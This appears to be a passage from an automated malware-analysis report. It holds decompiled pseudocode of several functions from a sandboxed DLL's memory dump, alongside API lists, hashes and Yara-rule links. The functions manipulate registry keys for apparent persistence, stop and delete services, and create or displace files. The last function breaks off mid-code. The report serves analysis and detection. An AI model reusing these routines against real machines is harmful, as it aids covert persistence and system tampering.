                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
                                                                                                        • String ID: g$h$t
                                                                                                        • API String ID: 1023576463-572828210
                                                                                                        • Opcode ID: 4ed55643fcc5fb0894dcd2ddaddd71ea1fafe11db088a7a39b8c25b407844817
                                                                                                        • Instruction ID: f1f5d0a167c2568dd2a23655aba8361baa0e96aa8708cbc0f8eac945769e0e86
                                                                                                        • Opcode Fuzzy Hash: 4ed55643fcc5fb0894dcd2ddaddd71ea1fafe11db088a7a39b8c25b407844817
                                                                                                        • Instruction Fuzzy Hash: 0E8140B2528301AFD300CFA5DC64F6B73E9ABD8700F10992DB555C73D0E674E9049BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985640, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 121memorysleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 61%
                                                                                                        			E70985640(void* __ebp, intOrPtr _a4) {
				char _v268;
				long _v272;
				char _v276;
				void* __ebx;
				void* __edi;
				WCHAR* _t8;
				void* _t16;
				long _t21;
				WCHAR* _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				char* _t48;
				char* _t50;

				_t48 =  &_v268;
				_t43 = _a4;
				if( *0x7098f5bc != 0 || _t43 != 0) {
					E709843A0();
				}
				_push(_t32);
				_t41 = StrChrW;
				if( *0x7098f5f4 != 0 && ( *0x7098f5f0 != 0 || _t43 != 0)) {
					_push(1);
					_push(StrChrW(0x7098cbb8, 0x50));
					_t29 = StrChrW(0x7098cb94, 0x55);
					_t37 =  *0x7098f5f4; // 0x1
					_t30 =  *0x7098f5e4; // 0xb52c80
					E70984F60(_t37, _t30, _t29);
					_t48 =  &(_t48[0x14]);
				}
				_push(0);
				_push(0);
				E709847A0(_t32, _t41);
				_t8 = StrChrW(0x7098c490, 0x2e);
				_t38 =  *0x7098f5cc; // 0xb757b8
				E70982EF0(_t38, _t8);
				_t50 =  &(_t48[0x10]);
				Sleep(0xfa0);
				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				if(_t44 != 0) {
					_v272 = GetTickCount();
					_t21 = RtlRandom( &_v272);
					_t36 =  *0x7098f5cc; // 0xb757b8
					_push(_t36);
					_push(0xa);
					_push(_t21);
					_push(_t36);
					wsprintfW(_t44, StrChrW(0x7098cb08, 0x2f));
					_push(0);
					_push(0);
					_push(0);
					E709844E0(0, StrChrW(0x7098caf4, 0x63), _t44);
					_t50 =  &(_t50[0x30]);
					HeapFree(GetProcessHeap(), 0, _t44);
				}
				_t35 =  *0x7098f62c; // 0x784250
				_push(0x4b);
				_push(_t35);
				_push(StrChrA(0x7098ca94, 0x47));
				wsprintfA( &_v276, StrChrA(0x7098ca8c, 0x25));
				_t16 = OpenEventA(2, 0,  &_v268);
				_t46 = _t16;
				if(_t46 != 0) {
					SetEvent(_t46);
					return CloseHandle(_t46);
				}
				return _t16;
			}
























                                                                                                        0x70985640
                                                                                                        0x7098564e
                                                                                                        0x70985655
                                                                                                        0x7098565b
                                                                                                        0x7098565b
                                                                                                        0x70985667
                                                                                                        0x70985669
                                                                                                        0x7098566f
                                                                                                        0x7098567e
                                                                                                        0x70985689
                                                                                                        0x70985691
                                                                                                        0x70985693
                                                                                                        0x7098569a
                                                                                                        0x709856a1
                                                                                                        0x709856a6
                                                                                                        0x709856a6
                                                                                                        0x709856a9
                                                                                                        0x709856ab
                                                                                                        0x709856ad
                                                                                                        0x709856bc
                                                                                                        0x709856be
                                                                                                        0x709856c6
                                                                                                        0x709856cb
                                                                                                        0x709856d3
                                                                                                        0x709856ef
                                                                                                        0x709856f3
                                                                                                        0x709856fb
                                                                                                        0x70985704
                                                                                                        0x7098570a
                                                                                                        0x70985710
                                                                                                        0x70985711
                                                                                                        0x70985713
                                                                                                        0x70985714
                                                                                                        0x70985720
                                                                                                        0x70985729
                                                                                                        0x7098572b
                                                                                                        0x7098572d
                                                                                                        0x7098573c
                                                                                                        0x70985741
                                                                                                        0x7098574a
                                                                                                        0x7098574a
                                                                                                        0x70985750
                                                                                                        0x7098575c
                                                                                                        0x7098575e
                                                                                                        0x70985768
                                                                                                        0x70985778
                                                                                                        0x7098578a
                                                                                                        0x70985790
                                                                                                        0x70985796
                                                                                                        0x70985799
                                                                                                        0x00000000
                                                                                                        0x709857a0
                                                                                                        0x709857ad

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CBB8,00000050,00000001), ref: 70985687
                                                                                                        • StrChrW.SHLWAPI(7098CB94,00000055,00000000), ref: 70985691
                                                                                                        • StrChrW.SHLWAPI(7098C490,0000002E), ref: 709856BC
                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 709856D3
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 709856E6
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709856E9
                                                                                                        • GetTickCount.KERNEL32 ref: 709856F5
                                                                                                        • RtlRandom.NTDLL ref: 70985704
                                                                                                        • StrChrW.SHLWAPI(7098CB08,0000002F,00B757B8,00000000,0000000A,00B757B8), ref: 7098571C
                                                                                                        • wsprintfW.USER32 ref: 70985720
                                                                                                        • StrChrW.SHLWAPI(7098CAF4,00000063,00000000,00000000,00000000,00000000), ref: 70985737
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985747
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098574A
                                                                                                        • StrChrA.SHLWAPI(7098CA94,00000047,00784250,0000004B), ref: 70985766
                                                                                                        • StrChrA.SHLWAPI(7098CA8C,00000025,00000000), ref: 70985770
                                                                                                        • wsprintfA.USER32 ref: 70985778
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 7098578A
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 70985799
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 709857A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
                                                                                                        • String ID: PBx
                                                                                                        • API String ID: 1614445722-258745131
                                                                                                        • Opcode ID: 5febc074252f725b8cdf9e9e89bccf6260539c05edb0be25761dc427efbb1227
                                                                                                        • Instruction ID: e96548ed4e0955ddc3b70d8037e6aedea1933ec3feb692a22b5d82e401d9f273
                                                                                                        • Opcode Fuzzy Hash: 5febc074252f725b8cdf9e9e89bccf6260539c05edb0be25761dc427efbb1227
                                                                                                        • Instruction Fuzzy Hash: 5F31C9F7A54314BFE2206B61DC5EF6F366CEB44B15F204125FA05A63D1E6B068049AB3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70984FD0, Relevance: 31.6, APIs: 21, Instructions: 150memoryregistrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E70984FD0(intOrPtr _a4) {
				short _v524;
				int _v528;
				int _v532;
				int _v536;
				void* _v540;
				void* _v544;
				long _t31;
				int _t36;
				short* _t40;
				int _t51;
				short* _t52;
				intOrPtr _t67;
				short* _t68;
				short* _t71;
				WCHAR* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				int _t80;

				_t75 =  *0x7098f638; // 0x7488d8
				_push(StrChrW(0x7098ca5c, 0x52));
				_push(_t75);
				wsprintfW( &_v532, StrChrW(0x7098ca4c, 0x25));
				_v544 = 0;
				_t31 = RegCreateKeyExW(0x80000001,  &_v524, 0, 0, 0, 0xf023f, 0,  &_v544, 0);
				if(_t31 != 0) {
					return _t31;
				} else {
					if(_a4 == 0) {
						_v528 = 0;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						if(_t77 == 0) {
							L12:
							return RegCloseKey(_v544);
						}
						_t67 =  *0x7098f5e0; // 0xb52c80
						_push(_t67);
						_t36 = wsprintfW(_t77, StrChrW(0x7098ca3c, 0x22));
						_t68 =  *0x7098f5ec; // 0xb52cda
						_v528 = _t36;
						_v536 = 0;
						_v532 = 1;
						if(RegQueryValueExW(_v540, _t68, 0,  &_v532, 0,  &_v536) != 0) {
							L10:
							_t40 =  *0x7098f5ec; // 0xb52cda
							RegSetValueExW(_v540, _t40, 0, 1, _t77, _v528 + _v528 + 2);
							L11:
							HeapFree(GetProcessHeap(), 0, _t77);
							goto L12;
						}
						_t17 = _v536 + 2; // 0xb52cdc
						_t74 = HeapAlloc(GetProcessHeap(), 8, _v536 + _t17);
						if(_t74 == 0) {
							goto L10;
						}
						_t71 =  *0x7098f5ec; // 0xb52cda
						if(RegQueryValueExW(_v540, _t71, 0,  &_v532, _t74,  &_v536) != 0) {
							L8:
							_t80 = _v524;
							L9:
							HeapFree(GetProcessHeap(), 0, _t74);
							if(_t80 != 0) {
								goto L11;
							}
							goto L10;
						}
						_t51 = lstrcmpiW(_t74, _t77);
						_t80 = 1;
						if(_t51 == 0) {
							goto L9;
						}
						goto L8;
					}
					_t52 =  *0x7098f5ec; // 0xb52cda
					RegDeleteValueW(_v544, _t52);
					return RegCloseKey(_v544);
				}
			}





















                                                                                                        0x70984fd8
                                                                                                        0x70984fee
                                                                                                        0x70984fef
                                                                                                        0x70985005
                                                                                                        0x70985025
                                                                                                        0x70985029
                                                                                                        0x70985031
                                                                                                        0x7098517a
                                                                                                        0x70985037
                                                                                                        0x7098503e
                                                                                                        0x70985074
                                                                                                        0x70985081
                                                                                                        0x70985085
                                                                                                        0x70985165
                                                                                                        0x00000000
                                                                                                        0x7098516b
                                                                                                        0x7098508b
                                                                                                        0x70985091
                                                                                                        0x7098509d
                                                                                                        0x7098509f
                                                                                                        0x709850ae
                                                                                                        0x709850c6
                                                                                                        0x709850ce
                                                                                                        0x709850da
                                                                                                        0x7098513a
                                                                                                        0x7098513e
                                                                                                        0x70985153
                                                                                                        0x70985159
                                                                                                        0x7098515f
                                                                                                        0x00000000
                                                                                                        0x7098515f
                                                                                                        0x709850e0
                                                                                                        0x709850f0
                                                                                                        0x709850f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709850f6
                                                                                                        0x70985113
                                                                                                        0x70985126
                                                                                                        0x70985126
                                                                                                        0x7098512a
                                                                                                        0x70985130
                                                                                                        0x70985138
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985138
                                                                                                        0x70985117
                                                                                                        0x7098511d
                                                                                                        0x70985124
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985124
                                                                                                        0x70985040
                                                                                                        0x7098504b
                                                                                                        0x70985065
                                                                                                        0x70985065

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CA5C,00000052), ref: 70984FEC
                                                                                                        • StrChrW.SHLWAPI(7098CA4C,00000025,007488D8,00000000), ref: 70984FF7
                                                                                                        • wsprintfW.USER32 ref: 70985005
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70985029
                                                                                                        • RegDeleteValueW.ADVAPI32(?,00B52CDA), ref: 7098504B
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 70985056
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70985078
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098507B
                                                                                                        • StrChrW.SHLWAPI(7098CA3C,00000022,00B52C80), ref: 70985099
                                                                                                        • wsprintfW.USER32 ref: 7098509D
                                                                                                        • RegQueryValueExW.ADVAPI32 ref: 709850D6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00B52CDC), ref: 709850E7
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709850EA
                                                                                                        • RegQueryValueExW.ADVAPI32(00B52CDA,00B52CDA,00000000,?,00000000,00B52CDA), ref: 7098510F
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 70985117
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098512D
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70985130
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,00B52CDA,00000000,00000001,00000000,?), ref: 70985153
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098515C
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098515F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 7098516B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$ProcessValue$AllocCloseFreeQuerywsprintf$CreateDeletelstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 3381264827-0
                                                                                                        • Opcode ID: 5659ed7a77ee88a988820a6e4794ac43dafeb4f4c0050aff4519d79e37e0f58b
                                                                                                        • Instruction ID: 4b14d4c376bbc026bce32c72ed1942b4510f5a24baccd87e3212d2fd343bf1ed
                                                                                                        • Opcode Fuzzy Hash: 5659ed7a77ee88a988820a6e4794ac43dafeb4f4c0050aff4519d79e37e0f58b
                                                                                                        • Instruction Fuzzy Hash: EA414CB2118304BBD210DFA1DC89FAB77ACEB88B44F10452DFA55963C0D774E909DB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981100, Relevance: 28.7, APIs: 19, Instructions: 154memoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E70981100(intOrPtr _a4, intOrPtr _a8) {
				short _v528;
				short _v536;
				short _v1044;
				short _v1052;
				long _v1056;
				short _v1060;
				intOrPtr _t24;
				WCHAR* _t40;
				void* _t43;
				WCHAR* _t48;
				void* _t54;
				intOrPtr _t69;
				void* _t72;
				void* _t79;

				_t24 = _a4;
				_v1056 = 0;
				if(_t24 != 2) {
					if(_t24 != 3) {
						goto L15;
					} else {
						CloseHandle( *(_a8 + 0x14));
						return 1;
					}
				} else {
					_t75 = _a8;
					_v1052 =  *(_a8 + 0x10);
					_t79 = E7098A810( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
					if(_t79 != 0) {
						_t72 = E7098A810( *((intOrPtr*)(_t75 + 4)), ( *(_t75 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
						if(_t72 != 0) {
							wsprintfW( &_v1052, StrChrW(0x7098c470, 0x5c));
							PathRemoveFileSpecW( &_v1044);
							PathAddBackslashW( &_v1044);
							_t40 =  &_v1044;
							__imp__SHCreateDirectoryExW(0, _t40, 0, _t79, _t72, _t54);
							if(_t40 == 0 || _t40 == 0x50 || _t40 == 0xb7) {
								_push(_t72);
								_push(_t79);
								wsprintfW( &_v1060, StrChrW(0x7098c470, 0x5c));
								_t43 = CreateFileW( &_v1052, 0xc0000000, 0, 0, 4, 0x80, 0);
								if(_t43 != 0xffffffff) {
									L11:
									_v1060 = _t43;
								} else {
									if( *_v1056 != 0 && GetFileAttributesW( &_v1052) != 0xffffffff) {
										_t48 = StrChrW(0x7098c464, 0x2e);
										_t69 =  *0x7098f2a0; // 0x0
										_push(_t48);
										_push(_t69);
										_push(0x2e);
										_push( &_v1056);
										wsprintfW( &_v536, StrChrW(0x7098c44c, 0x25));
										if(MoveFileExW( &_v1052,  &_v528, 0) != 0) {
											_t43 = CreateFileW( &_v1052, 0xc0000000, 0, 0, 4, 0x80, 0);
											if(_t43 != 0xffffffff) {
												goto L11;
											}
										}
									}
								}
							}
							HeapFree(GetProcessHeap(), 0, _t72);
						}
						HeapFree(GetProcessHeap(), 0, _t79);
					}
					L15:
					return _v1056;
				}
			}

















                                                                                                        0x70981106
                                                                                                        0x7098110d
                                                                                                        0x70981117
                                                                                                        0x709812bb
                                                                                                        0x00000000
                                                                                                        0x709812bd
                                                                                                        0x709812c8
                                                                                                        0x709812d9
                                                                                                        0x709812d9
                                                                                                        0x7098111d
                                                                                                        0x7098111f
                                                                                                        0x7098112b
                                                                                                        0x7098113a
                                                                                                        0x70981141
                                                                                                        0x7098115e
                                                                                                        0x70981165
                                                                                                        0x70981189
                                                                                                        0x70981193
                                                                                                        0x7098119e
                                                                                                        0x709811a6
                                                                                                        0x709811ad
                                                                                                        0x709811b5
                                                                                                        0x709811c7
                                                                                                        0x709811c8
                                                                                                        0x709811d8
                                                                                                        0x709811f4
                                                                                                        0x709811fd
                                                                                                        0x70981286
                                                                                                        0x70981286
                                                                                                        0x70981203
                                                                                                        0x7098120a
                                                                                                        0x70981223
                                                                                                        0x70981225
                                                                                                        0x7098122b
                                                                                                        0x7098122c
                                                                                                        0x7098122d
                                                                                                        0x70981233
                                                                                                        0x70981246
                                                                                                        0x70981262
                                                                                                        0x7098127b
                                                                                                        0x70981284
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981284
                                                                                                        0x70981262
                                                                                                        0x7098120a
                                                                                                        0x709811fd
                                                                                                        0x70981294
                                                                                                        0x7098129a
                                                                                                        0x709812a5
                                                                                                        0x709812ab
                                                                                                        0x709812ae
                                                                                                        0x709812b7
                                                                                                        0x709812b7

                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(?), ref: 709812C8
                                                                                                          • Part of subcall function 7098A810: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,77E34620,00000100,74B04F20,00000000,70988E8F,00000000,00000000,00000000,4B7826AF,00000100), ref: 7098A82F
                                                                                                          • Part of subcall function 7098A810: GetProcessHeap.KERNEL32(00000008,00000002), ref: 7098A842
                                                                                                          • Part of subcall function 7098A810: HeapAlloc.KERNEL32(00000000), ref: 7098A849
                                                                                                          • Part of subcall function 7098A810: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 7098A859
                                                                                                        • StrChrW.SHLWAPI(7098C470,0000005C,00000000,00000000), ref: 7098117B
                                                                                                        • wsprintfW.USER32 ref: 70981189
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 70981193
                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 7098119E
                                                                                                        • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 709811AD
                                                                                                        • StrChrW.SHLWAPI(7098C470,0000005C,00000000,00000000), ref: 709811D0
                                                                                                        • wsprintfW.USER32 ref: 709811D8
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 709811F4
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70981211
                                                                                                        • StrChrW.SHLWAPI(7098C464,0000002E), ref: 70981223
                                                                                                        • StrChrW.SHLWAPI(7098C44C,00000025,?,0000002E,00000000,00000000), ref: 7098123B
                                                                                                        • wsprintfW.USER32 ref: 70981246
                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 7098125A
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 7098127B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098128D
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981294
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098129E
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709812A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
                                                                                                        • String ID:
                                                                                                        • API String ID: 452034401-0
                                                                                                        • Opcode ID: c2b6bc0fc6efc33b16da664e549fb77bf08db45624158960ee5880de9948e7fc
                                                                                                        • Instruction ID: 10ee21cea40d59e488998bd9c2ca43c7d3ee6b35072d8a423ac4311b94bbe9af
                                                                                                        • Opcode Fuzzy Hash: c2b6bc0fc6efc33b16da664e549fb77bf08db45624158960ee5880de9948e7fc
                                                                                                        • Instruction Fuzzy Hash: 7E41C6B2658300ABE3209BA1CC49F6F77ACEB88715F104A19F656D63D1DB74E444CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709843A0, Relevance: 27.1, APIs: 18, Instructions: 108registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E709843A0() {
				short _v528;
				short _v532;
				short _v536;
				short _v540;
				short _v544;
				void* _t12;
				intOrPtr _t15;
				intOrPtr _t26;
				short* _t49;

				_t12 = E70983850(StrChrW(0x7098c90c, 0x55), 1);
				_t49 =  &(( &_v528)[4]);
				if(_t12 == 0) {
					return _t12;
				}
				if( *0x7098f5f4 != 0) {
					_push(0x7098c560);
					_push(0);
					_push(StrChrW(0x7098c8d0, 0x73));
					_t26 =  *0x7098f52c; // 0x748878
					_push(_t26);
					wsprintfW( &_v536, StrChrW(0x7098c824, 0x25));
					_t49 =  &(_t49[0xc]);
					_v532 = 0;
					if(RegCreateKeyExW(0x80000002,  &_v528, 0, 0, 0, 0xf023f, 0,  &_v532, 0) == 0) {
						RegDeleteValueW(_v536, StrChrW(0x7098c90c, 0x55));
						RegCloseKey(_v536);
					}
				}
				_push(StrChrW(0x7098c8e4, 0x55));
				_push(0x5c);
				_push(StrChrW(0x7098c8d0, 0x73));
				_t15 =  *0x7098f52c; // 0x748878
				_push(_t15);
				wsprintfW( &_v540, StrChrW(0x7098c824, 0x25));
				RegDeleteKeyW(0x80000002,  &_v532);
				_push(0x7098c560);
				_push(StrChrW(0x7098c90c, 0x55));
				_push(StrChrW(0x7098c780, 0x5c));
				wsprintfW( &_v544, StrChrW(0x7098c740, 0x53));
				return RegDeleteKeyW(0x80000002,  &_v536);
			}












                                                                                                        0x709843b9
                                                                                                        0x709843be
                                                                                                        0x709843c3
                                                                                                        0x709844d9
                                                                                                        0x709844d9
                                                                                                        0x709843d8
                                                                                                        0x709843da
                                                                                                        0x709843df
                                                                                                        0x709843ea
                                                                                                        0x709843eb
                                                                                                        0x709843f0
                                                                                                        0x70984400
                                                                                                        0x70984402
                                                                                                        0x70984423
                                                                                                        0x70984433
                                                                                                        0x70984444
                                                                                                        0x7098444f
                                                                                                        0x7098444f
                                                                                                        0x70984433
                                                                                                        0x7098445e
                                                                                                        0x7098445f
                                                                                                        0x7098446a
                                                                                                        0x7098446b
                                                                                                        0x70984470
                                                                                                        0x70984480
                                                                                                        0x70984495
                                                                                                        0x70984497
                                                                                                        0x709844a5
                                                                                                        0x709844af
                                                                                                        0x709844bf
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000001), ref: 709843B6
                                                                                                          • Part of subcall function 70983850: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 70983869
                                                                                                          • Part of subcall function 70983850: OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983875
                                                                                                          • Part of subcall function 70983850: OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 7098388D
                                                                                                          • Part of subcall function 70983850: QueryServiceStatus.ADVAPI32(00000000,?), ref: 7098389F
                                                                                                          • Part of subcall function 70983850: ControlService.ADVAPI32(00000000,00000001,?), ref: 709838B4
                                                                                                          • Part of subcall function 70983850: QueryServiceStatus.ADVAPI32(00000000,?), ref: 709838CC
                                                                                                          • Part of subcall function 70983850: Sleep.KERNEL32(000003E8), ref: 709838DE
                                                                                                          • Part of subcall function 70983850: CloseServiceHandle.ADVAPI32(00000000), ref: 70983905
                                                                                                          • Part of subcall function 70983850: CloseServiceHandle.ADVAPI32(00000000), ref: 70983910
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,00000000,7098C560), ref: 709843E8
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000), ref: 709843F8
                                                                                                        • wsprintfW.USER32 ref: 70984400
                                                                                                        • RegCreateKeyExW.ADVAPI32 ref: 7098442B
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055), ref: 7098443C
                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 70984444
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 7098444F
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055), ref: 7098445C
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,0000005C,00000000), ref: 70984468
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000), ref: 70984478
                                                                                                        • wsprintfW.USER32 ref: 70984480
                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 70984495
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,7098C560), ref: 709844A3
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 709844AD
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 709844B7
                                                                                                        • wsprintfW.USER32 ref: 709844BF
                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 709844CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2810420714-0
                                                                                                        • Opcode ID: 4f910abca14d63d61856c2d15b9e6bb9ee21f161857bd241c1d677fd7d7da664
                                                                                                        • Instruction ID: b97c84aa1e146fae7c3f8247b971f6cf3ea5b0c2051d6096ff1cadbd4b92b48e
                                                                                                        • Opcode Fuzzy Hash: 4f910abca14d63d61856c2d15b9e6bb9ee21f161857bd241c1d677fd7d7da664
                                                                                                        • Instruction Fuzzy Hash: 403186F27543047EF2209BA59C5EF6F7B9CDB84B15F104619FB44AA2C0E7B0A5048AB3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709845B0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 162registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709845B0() {
				short _v524;
				char _v724;
				short _v728;
				int _v732;
				int _v740;
				char _v744;
				char _v752;
				int _v756;
				int _v760;
				int _v764;
				int _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				int _t63;
				WCHAR* _t70;
				short* _t80;
				int _t101;
				int _t104;

				_t80 =  *0x7098f634; // 0x751780
				_t101 = 0;
				_v768 = 0;
				_v776 = 0;
				if(RegOpenKeyExW(0x80000002, _t80, 0, 0xf003f,  &_v776) != 0) {
					L16:
					return _t101;
				}
				_v752 = 0;
				_v732 = 0;
				_v728 = 0;
				_v740 = 0;
				if(RegQueryInfoKeyW(_v776, 0, 0, 0,  &_v752,  &_v732, 0,  &_v728,  &_v740, 0, 0, 0) != 0 || _v752 <= 0) {
					L15:
					RegCloseKey(_v776);
					goto L16;
				} else {
					_v760 = 0;
					_t104 = 4;
					do {
						_v744 = 0x104;
						if(RegEnumKeyExW(_v776, _v760,  &_v524,  &_v744, 0, 0, 0, 0) != 0) {
							goto L13;
						}
						_v772 = 0;
						if(RegOpenKeyExW(_v776,  &_v524, 0, 0x2001b,  &_v772) != 0) {
